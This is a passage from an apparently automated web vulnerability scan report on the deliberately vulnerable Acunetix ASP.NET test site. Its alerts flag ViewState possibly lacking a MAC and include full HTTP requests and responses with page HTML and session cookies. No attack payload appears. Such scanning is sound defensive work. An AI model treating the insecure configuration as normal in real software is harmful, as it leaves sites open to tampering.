          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        2. GET http://testaspnet.vulnweb.com/
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate, but possibly without a MAC.

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        3. GET http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
